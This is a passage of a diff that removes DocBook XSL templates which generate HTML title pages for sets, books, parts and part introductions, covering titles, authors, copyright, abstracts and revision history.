-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="book.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="bookinfo/title">
-      <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="bookinfo/subtitle">
-      <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/corpauthor"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/authorgroup"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/author"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/othercredit"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/releaseinfo"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/copyright"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/legalnotice"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/pubdate"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/revision"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/revhistory"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/abstract"/>
-  <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="book.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="book.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="book.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="book.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="book.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="book.titlepage.before.recto"/>
-      <xsl:call-template name="book.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="book.titlepage.before.verso"/>
-      <xsl:call-template name="book.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="book.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="book.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="book.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="part.titlepage.recto">
-  <div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:call-template name="division.title">
-<xsl:with-param name="node" select="ancestor-or-self::part[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="partinfo/subtitle">
-      <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/corpauthor"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/authorgroup"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/author"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/othercredit"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/releaseinfo"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/copyright"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/legalnotice"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/pubdate"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/revision"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/revhistory"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/abstract"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="part.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="part.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="part.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="part.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="part.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="part.titlepage.before.recto"/>
-      <xsl:call-template name="part.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="part.titlepage.before.verso"/>
-      <xsl:call-template name="part.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="part.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="part.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="part.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="partintroinfo/title">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="partintroinfo/subtitle">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/corpauthor"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/authorgroup"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/author"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/othercredit"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/releaseinfo"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/copyright"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/legalnotice"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/pubdate"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/revision"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/revhistory"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/abstract"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage">
-  <div>
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="partintro.titlepage.before.recto"/>
-      <xsl:call-template name="partintro.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="partintro.titlepage.before.verso"/>
-      <xsl:call-template name="partintro.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="partintro.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="partintro.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="partintro.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
